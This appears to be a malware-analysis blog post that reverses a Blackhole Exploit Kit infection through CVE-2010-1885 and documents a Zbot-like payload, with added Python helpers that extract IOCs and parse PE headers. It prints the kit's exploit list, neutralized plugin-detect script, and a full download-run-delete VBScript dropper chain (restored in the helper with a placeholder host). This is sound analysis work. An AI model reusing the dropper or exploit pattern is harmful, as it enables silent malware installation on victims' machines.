That just happened today and really made my day. Since the flaw was fixed by Microsoft about two years ago, I never expected to see unpatched systems still having this flaw, yet they do exist, a bunch of them. Surprisingly, since there is some possibility that XP users also have a similar risk, I dare myself to write up the reversing of this infection for your information on handling similar cases.
The infector was BHEK at 85.17.165.22, which looks to have been up for less than 24h, with reports here --->>[URL-QUERY-LINK]
The landing page is: h00p://85.17.165.22/main.php?page=9adab93ef87c3421
And it has the infection components below:

    /Gam.jar             EXPL: Java/2012-1723 (see the explanation below)
    /data/field.swf      EXPL: SWF/CVE-2011-0611 ---> shellcode --> same payload
    /data/ap1.php        EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload
    /data/ap2.php        EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload
    /w.php?f=f4dfb&e=1   EXPL: Java/2012-1723 SAV: Gam.jar --> shellcode --> same payload
    /w.php?f=f4dfb&e=2   EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload
    /w.php?f=f4dfb&e=5   EXPL: CVE-2010-1885/HCP vulns SAV: %TEMP%\file.exe

↑ Look closely at the last line; this is the case I will describe here.

The moral of the story is: do not underestimate "any" exploit implemented in the exploit kit. Those exploits are picked well and are meant for a well-planned infection purpose, even the one you think has the smaller chance to infect. When it hits, you may get yourself an epidemic.
If you deobfuscate the landing page well, you'll see the BHEK plugin detect. Just in case, you can see my neutralized deobfs code here: --->>[PASTEBIN]
At line 1790 you will see code like this (neutralized like the rest of this post: "・" stands for ".", "「」" for "[]", the letter O for the digit 0, and IFRAM3 for IFRAME; it is not runnable as printed):

    Function spl4() {
        try {
            For (var i = O, m; i < navigator・plugins・length; i++) {
                var name = navigator・plugins「i」.name;
                iF (name.indexOF('Media Player') != -1) {
                    m = document・createElement('IFRAM3');
                    m.setAttribute('src', './data/hhcp.php?c=F4dFb');
                    m.setAttribute('width', O);
                    m.setAttribute('height', O);
                    document・body「'appendChild'」(m)
                }
    (snipped)

Which will lead you to the downloaded HTML file at:
h00p://85.17.165.22/data/hhcp.php?c=F4dFb
This file contains another obfuscated block (an eval). It can be decoded as per the pic below: an iframe that contains the exploit and also the execution of an arbitrary command. The format of the malicious iframe is as per below:

    <iframe src="xxxxx=<script defer>Run(yyyyy);</script>">
    // legend: xxxxx = CVE-2010-1885 PoC strings
    //         yyyyy = arbitrary command to be executed

If you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see the similarity; here's the PoC link --> http://seclists.org/fulldisclosure/2010/Jun/205
Following, "yyyyy" is a combination of cmd and Windows (Visual Basic) Script commands. It is one single command line, broken here at each "&&" for readability:

    cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\go・vbs
    &&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\go・vbs
    &&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\go・vbs
    &&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\go・vbs
    &&echo objHTTP・Send>>%TEMP%\go・vbs
    &&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\go・vbs
    &&echo Const adTypeBinary = 1 >>%TEMP%\go・vbs
    &&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\go・vbs
    &&echo Const adSaveCreateNotExist = 1 >>%TEMP%\go・vbs
    &&echo oStream・type = adTypeBinary >>%TEMP%\go・vbs
    &&echo oStream・open >>%TEMP%\go・vbs
    &&echo oStream・write objHTTP・responseBody>>%TEMP%\go・vbs
    &&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\go・vbs
    &&echo oStream・close>>%TEMP%\go・vbs
    &&echo set oStream = nothing >>%TEMP%\go・vbs
    &&echo Set xml = Nothing >>%TEMP%\go・vbs
    &&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\go・vbs
    &&echo WshShell・Run FileName, 0, True >>%TEMP%\go・vbs
    &&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\go・vbs
    &&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\go・vbs|cscript %TEMP%\go・vbs>nul

(PS: the above code was neutralized and is NOT malicious!)
↑ Which means: download the file from 85.17.165.22/w・php?f=f4dfb&e=5 with an MSXML2.XMLHTTP request, save it as %TEMP%\file.exe through an ADODB.Stream, run it hidden (window style 0) via WshShell.Run and wait for it to exit, and then DELETE go.vbs afterwards via FileSystemObject (note that the DeleteFile call removes the dropper script itself, not file.exe). (This was the reason I couldn't get the sample file from the infected PC and had to extract it out of memory manually.)
The worse part is that almost everyone misses this tiny obfuscated file; even on VirusTotal ONLY 3 (three) products detect it:
MD5: 5629b24e0faae7b42127df9f592fed48
File size: 5.2 KB (5326 bytes)
File name: hhcp.php@c=f4dfb
File type: HTML
Tags: html cve-2010-1885 exploit
Detection: 3 / 43
Analysis date: 2012-09-19 19:36:44 UTC (1 hour, 7 minutes ago)
URL: ------>>[VIRUS-TOTAL]

Furthermore, the payload looks like this "fake" Intel logo (see the pic). It runs both of these processes:

    PID  MEM         PATH                 Event
    216  2007536674  %path%unknown.exe    Global\crypt32LogoffEvent   // stays as a process
    840  2088831062  %System%svchost.exe                              // kicking off svchost

I don't have enough time to do a deep analysis of this binary, so a quick one then.. Binary snapshot:

    0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
    0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
    0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    0030 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 ................
    0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
    0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
    0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
    0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
    0080 A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9 .....j...j...j..
    0090 EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9 .I...j...j...j..
    00A0 73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9 sJ...j...I...j..
    00B0 82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9 .u...j..Rich.j..
    00C0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00 ........PE..L...
    00D0 A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01 .xWP............

Sections:

    .text   0x44000 (snipped)
    .rdata  0x45000 0x2d84 11776
    .data   0x48000 0xd38  3584
    .adata  0x49000 0x10   512
    .CRT    0x4b000 0x10   512   <--- cryptor pack
    .rsrc   0x4c000 0x1a18 7168

Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown

Shortly, some suspicious calls were detected while it stays in process. Below is my adventure in the reversing graph, the way it steals so much info; I guess it is a variant of the ZeuS Trojan (ZeuS/Zbot) ↓

In the meantime, VirusTotal detects it as per below:
MD5: c559573fc5ab9862607e4fa4b2edfc04
File size: 294.0 KB (301056 bytes)
File name: unknown.exe
File type: Win32 EXE
Detection: 19 / 43
Analysis date: 2012-09-19 17:58:31 UTC (1 minute ago)
URL: ---->>[VIRUS-TOTAL]

The current malware names are:
F-Secure: Trojan.Generic.KD.731435
Microsoft: PWS:Win32/Zbot
VIPRE: Trojan.Win32.Generic!BT
Symantec: Trojan.Gen
TrendMicro: TROJ_GEN.R42CDII
McAfee-GW-Edition: PWS-Zbot.vo!a
Fortinet: W32/Androm.DW!tr
TrendMicro-HouseCall: TROJ_GEN.R42CDII
Avast: Win32:Trojan-gen
Ikarus: Trojan-Spy.Win32.Zbot
GData: Trojan.Generic.KD.731435
Kaspersky: HEUR:Trojan.Win32.Generic
BitDefender: Trojan.Generic.KD.731435
McAfee: PWS-Zbot.gen.ana
Panda: Trj/Genetic.gen
AhnLab-V3: Spyware/Win32.Zbot
AntiVir: TR/Injector.air.1
Sophos: Mal/EncPk-AGK
Comodo: UnclassifiedMalware
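The "cmd /c echo ... >> go.vbs | cscript go.vbs" chain above is a pattern you will meet again in other kits, so here is a small helper to pull the dropped script and its IOCs back out of such a one-liner without running it. This is an added example, not code from the original post or from MalwareMustDie: it is a Python script I wrote for this write-up, and the sample it parses is the post's own chain with the "・" neutralization undone and the download host kept as the x.x.x.x placeholder the post itself uses. The function names (reconstruct_dropped_script, extract_iocs) are mine. It is written generically, so it works for any echo-append chain, not only this go.vbs case.

```python
import re

# Constructed sample: the dropper one-liner from the post, de-neutralized for
# parsing, host kept as the x.x.x.x placeholder (no real C2 address here).
SAMPLE_CMD = (
    r'cmd /c echo FileName = "%TEMP%\file.exe">>%TEMP%\go.vbs'
    r'&&echo url="http://x.x.x.x/w.php?f=f4dfb&e=5" >>%TEMP%\go.vbs'
    r'&&echo Set objHTTP = CreateObject("MSXML2.XMLHTTP")>>%TEMP%\go.vbs'
    r'&&echo Call objHTTP.Open("GET", url, False)>>%TEMP%\go.vbs'
    r'&&echo objHTTP.Send>>%TEMP%\go.vbs'
    r'&&echo set oStream = createobject("Adodb.Stream")>>%TEMP%\go.vbs'
    r'&&echo Const adTypeBinary = 1 >>%TEMP%\go.vbs'
    r'&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\go.vbs'
    r'&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\go.vbs'
    r'&&echo oStream.type = adTypeBinary >>%TEMP%\go.vbs'
    r'&&echo oStream.open >>%TEMP%\go.vbs'
    r'&&echo oStream.write objHTTP.responseBody>>%TEMP%\go.vbs'
    r'&&echo oStream.savetofile FileName, adSaveCreateNotExist >>%TEMP%\go.vbs'
    r'&&echo oStream.close>>%TEMP%\go.vbs'
    r'&&echo set oStream = nothing >>%TEMP%\go.vbs'
    r'&&echo Set xml = Nothing >>%TEMP%\go.vbs'
    r'&&echo Set WshShell = CreateObject("WScript.Shell") >>%TEMP%\go.vbs'
    r'&&echo WshShell.Run FileName, 0, True >>%TEMP%\go.vbs'
    r'&&echo Set FSO = CreateObject("Scripting.FileSystemObject") >>%TEMP%\go.vbs'
    r'&&echo FSO.DeleteFile "%TEMP%\go.vbs" >>%TEMP%\go.vbs|cscript %TEMP%\go.vbs>nul'
)

COM_OBJECT = re.compile(r'CreateObject\("([^"]+)"\)', re.I)


def reconstruct_dropped_script(cmdline):
    """Rebuild the file a `cmd /c echo X>>F && echo Y>>F | interp F` chain writes.

    Returns (target path, script lines in write order, final runner command).
    The chain is split on '&&' only, so a single '&' inside a URL survives.
    """
    body = cmdline.strip()
    if body.lower().startswith("cmd /c "):
        body = body[len("cmd /c "):]
    target, runner, lines = None, None, []
    for segment in body.split("&&"):
        segment = segment.strip()
        if not segment.lower().startswith("echo "):
            continue
        text, sep, redirect = segment[len("echo "):].rpartition(">>")
        if not sep:
            continue                      # a plain echo, nothing appended to disk
        if "|" in redirect:               # last segment pipes the file into cscript
            redirect, runner = redirect.split("|", 1)
        path = redirect.strip()
        if target is None:
            target = path
        elif path != target:
            raise ValueError("chain writes to more than one file: %s vs %s" % (target, path))
        lines.append(text.strip())
    return target, lines, (runner.strip() if runner else None)


def extract_iocs(lines):
    """Pull download URL, drop path, self-delete target and run flags out of the VBScript."""
    script = "\n".join(lines)
    iocs = {"download_url": None, "dropped_file": None, "self_delete": None,
            "run_hidden": False, "wait_for_exit": False,
            "com_objects": COM_OBJECT.findall(script)}
    m = re.search(r'\burl\s*=\s*"([^"]+)"', script, re.I)
    if m:
        iocs["download_url"] = m.group(1)
    m = re.search(r'\bFileName\s*=\s*"([^"]+)"', script, re.I)
    if m:
        iocs["dropped_file"] = m.group(1)
    m = re.search(r'\.DeleteFile\s+"([^"]+)"', script, re.I)
    if m:
        iocs["self_delete"] = m.group(1)
    m = re.search(r'\.Run\s+(\w+)\s*,\s*(\d+)\s*,\s*(True|False)', script, re.I)
    if m:
        iocs["run_target"] = m.group(1)
        iocs["run_hidden"] = m.group(2) == "0"      # WshShell.Run window style 0 = hidden
        iocs["wait_for_exit"] = m.group(3).lower() == "true"
    return iocs


if __name__ == "__main__":
    target, lines, runner = reconstruct_dropped_script(SAMPLE_CMD)
    print("dropped script:", target, "| run by:", runner)
    print("\n".join(lines))
    for key, value in extract_iocs(lines).items():
        print("%-14s %s" % (key, value))
```

Running it on the sample prints the twenty-line go.vbs and reports the download URL, the drop path %TEMP%\file.exe, a hidden run that waits for the payload to exit, and %TEMP%\go.vbs as the only file the script deletes, which is the check worth making before concluding that a missing payload was removed by the dropper rather than by the payload itself.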
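The binary snapshot above already contains more than the compile time: the e_lfanew pointer at 0x3C, the COFF header (machine, section count, timestamp, characteristics) and, between the DOS stub and "PE", an undocumented Rich header whose XOR key follows the "Rich" marker and whose entries record the Microsoft toolchain builds that produced the object files. Here is an added example, not code from the original post or from MalwareMustDie, that parses exactly those 0xE0 bytes as they are printed in the snapshot and decodes them; the HEXDUMP constant is transcribed from the snapshot, and the function names (parse_hexdump, decode_rich_header, parse_pe_header) and the small flag tables are mine.

```python
import datetime
import struct

# Constructed input: the header bytes exactly as printed in the binary snapshot
# above (offsets 0x00-0xDF of unknown.exe); nothing beyond 0xDF is available here.
HEXDUMP = """\
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9 .....j...j...j..
0090 EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9 .I...j...j...j..
00A0 73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9 sJ...j...I...j..
00B0 82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9 .u...j..Rich.j..
00C0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00 ........PE..L...
00D0 A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01 .xWP............
"""

MACHINE = {0x014C: "i386", 0x8664: "x86-64"}
CHARACTERISTICS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
                   0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
                   0x2000: "DLL"}


def parse_hexdump(dump):
    """Turn 'OFFSET b0 b1 ... b15 ascii' rows back into raw bytes, checking contiguity."""
    raw = bytearray()
    for row in dump.splitlines():
        tokens = row.split()
        if len(tokens) < 17:
            continue
        if int(tokens[0], 16) != len(raw):
            raise ValueError("dump is not contiguous at row %s" % tokens[0])
        raw.extend(int(t, 16) for t in tokens[1:17])
    return bytes(raw)


def decode_rich_header(data):
    """Return (xor_key, [(product_id, build, count), ...]) or (None, []) if absent.

    Layout: "DanS"^key, 3 padding dwords (0^key), then (comp_id^key, count^key)
    pairs, then the literal "Rich" followed by the key itself.
    """
    rich = data.find(b"Rich")
    if rich < 0:
        return None, []
    key = struct.unpack_from("<I", data, rich + 4)[0]
    entries = []
    pos = rich - 8
    while pos >= 0:
        comp_id = struct.unpack_from("<I", data, pos)[0] ^ key
        if comp_id == 0x536E6144:          # "DanS" as a little-endian dword
            break
        count = struct.unpack_from("<I", data, pos + 4)[0] ^ key
        if comp_id or count:               # skip the zero padding after DanS
            entries.append((comp_id >> 16, comp_id & 0xFFFF, count))
        pos -= 8
    entries.reverse()                      # restore on-disk order
    return key, entries


def parse_pe_header(data):
    """Parse the DOS header, Rich header and COFF file header of a PE prefix."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at %#x" % e_lfanew)
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, chars) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    key, entries = decode_rich_header(data[:e_lfanew])
    when = datetime.datetime.fromtimestamp(timestamp, datetime.timezone.utc)
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINE.get(machine, "%#x" % machine),
        "sections": nsections,
        "timestamp": timestamp,
        "compile_time": when.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "optional_header_size": opt_size,
        "characteristics": [n for bit, n in sorted(CHARACTERISTICS.items()) if chars & bit],
        "rich_key": key,
        "rich_entries": entries,
    }


if __name__ == "__main__":
    info = parse_pe_header(parse_hexdump(HEXDUMP))
    for key, value in info.items():
        print("%-22s %s" % (key, value))
```

On the snapshot this reproduces the compile time the post gives (0x505778A8, 2012-09-17 19:23:20 UTC), shows a 32-bit i386 image with relocations stripped, and reports seven sections in the COFF header, one more than the six names in the section listing above, consistent with the snipped row. The five Rich entries, (product id, build, count) pairs under key 0xD9DC6AED, are the part a packer or cryptor rarely bothers to rewrite, which is why the Rich header is a useful pivot for clustering samples built with the same toolchain even when the timestamp is forged.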
And, to malware analysts/researchers (etc.): understanding how an infection works by reversing the malicious and exploit code yourself will change the way you think about handling malware in the future, trust me. You may continue with whatever automation system/tool you use, but at least once, try to figure it out on your own! I won't sell you no crap.
#MalwareMustDie!